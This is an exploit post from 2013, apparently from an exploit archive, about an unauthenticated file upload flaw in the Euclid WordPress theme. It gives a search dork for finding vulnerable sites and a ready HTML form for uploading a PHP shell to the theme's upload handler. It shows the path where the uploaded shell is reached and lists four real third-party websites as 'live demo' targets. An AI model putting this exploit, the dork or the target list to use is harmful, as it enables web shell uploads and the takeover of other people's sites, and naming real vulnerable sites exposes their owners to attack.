#Title : Wordpress Euclid V1 Themes CSRF File Upload Vulnerability #Author : DevilScreaM #Date : 11/17/2013 - 17 November 2013 #Category : Web Applications #Type : PHP #Version : 1.x.x #Vendor : http://freelancewp.com #Download : http://freelancewp.com/wordpress-theme/euclid/ #Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber #Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded | #Tested : Mozila, Chrome, Opera -> Windows & Linux #Vulnerabillity : CSRF #Dork : inurl:wp-content/themes/euclid_v1 CSRF File Upload Vulnerability Exploit & POC : http://site-target/wp-content/themes/euclid/functions/upload-handler.php http://site-target/wp-content/themes/euclid_v1.x.x/functions/upload-handler.php Script : <form enctype="multipart/form-data" action="http://127.0.0.1/wp-content/themes/euclid/functions/upload-handler.php" method="post"> Your File: <input name="uploadfile" type="file" /><br /> <input type="submit" value="upload" /> </form> File Access : http://site-target/uploads/[years]/[month]/your_shell.php Example : http://127.0.0.1/wp-content/uploads/2013/11/devilscream.php Live Demo : http://rapidmaintenanceuk.com/wp-content/themes/euclid_v1.0.1/functions/upload-handler.php http://cbaydeluxeresort.com/wp-content/themes/euclid_v1.0.1/functions/upload-handler.php http://abovethemoon.com/wp-content/themes/euclid_v1.0.1/functions/upload-handler.php http://education-maroc.com/wp-content/themes/euclid_v1.0.1/functions/upload-handler.php